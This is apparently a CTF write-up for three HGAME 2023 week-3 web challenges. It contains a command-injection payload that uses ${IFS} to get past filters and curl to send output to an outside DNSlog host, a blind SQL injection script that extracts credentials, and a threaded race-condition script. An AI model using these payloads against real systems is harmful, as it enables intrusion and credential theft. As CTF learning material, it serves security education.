HGAME_2023_WEB_WP_WEEK3

标签：__ WEB http IFS url FLAG flag WP WEEK3

Ping To The Host

很明显的rce，简单测试一下发现空格，cat，；被办，且执行无回显，空格用${IFS},%09,$IFS$9等等来绕过，我们利用dnslog将执行结果外带出来，这里使用的是http://ceye.io/

由于每次dnslog只能带出一条信息，我们利用sed -n来爆破其它信息

ip=|curl${IFS}http://?????.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'1p'`

 

 

 得到flag文件名为: flag_is_here_haha

flag也被办了，用通配符读取就行了

ip=|curl${IFS}http://?????.ceye.io/`ca''t%09/fla*`

 

Login To Get My Gift 简单的SQL注入，得到admin账号密码即可得到flag，这里直接给exp:

import requests
flag = ''
def attack_post(url):
    global flag
    r = requests.session()
    for i in range(1, 100000):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            payload = f"a'/**/||/**/((ascii(right(left(database(),{i}),1)))<{mid})#"
            payload1 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/database()),{i}),1)))<{mid})#"
            payload2 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/'User1nf0mAt1on'),{i}),1)))<{mid})#"
            payload3 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(concat_ws(':',UsErN4me,PAssw0rD))/**/from/**/User1nf0mAt1on),{i}),1)))<{mid})#"
            # print(payload)
            data = {
                'username': 'testuser',
                'password': payload3
            }
            rp = r.post(url, data=data)
            # print(rp.text)
            if 'Success!' in rp.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if low <= 32 or high >= 127:
            break
        flag += chr(mid - 1)
        print(flag)
if __name__ == '__main__':
    url = 'http://week-3.hgame.lwsec.cn:30369/login'
    attack_post(url)

Gopher Shop 下载附件是源码，先对题目环境分析一波，是一个商店的界面，售卖一些商品，其中有FLAG，可以知道肯定需要买到这个FLAG 接下来分析源码，找到user.go这个文件，这里面是对销售的一些功能实现，往下可以看到判断是否卖的出这个函数，if判断后，直接 对商品数量进行加减，这里猜测可以条件竞争，直接过if买到FLAG，其实正解应该是go的uint溢出，这里应该算非预期了。

import requests
import threading
headers = {
    'Cookie': 'SESSION=MTY3NDU1MjI0MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXw23LorOFg5LmryZzZcxm8ESbYpNFaTv1UjY2UkMozyJw==; session=MTY3NDcwNzYyM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fM5a-9HM-2vbFCrfAbfLVU049emtbxCloYDTab3QDEx-'
}
def get(url):
    r = requests.get(url=url, headers=headers)

if __name__ == '__main__':
    url = 'http://week-3.hgame.lwsec.cn:30552/api/v1/user/buyProduct?product=Flag&number=1'
    for i in range(100000):
        threading.Thread(target=get, args=(url,)).start()

然后界面就直接买到FLAG了，checkFLAG即可拿到flag值：

hgame{GopherShop_M@gic_1nt_0verflow}

 

标签：__,WEB,http,IFS,url,FLAG,flag,WP,WEEK3
From： https://www.cnblogs.com/F12-blog/p/17066181.html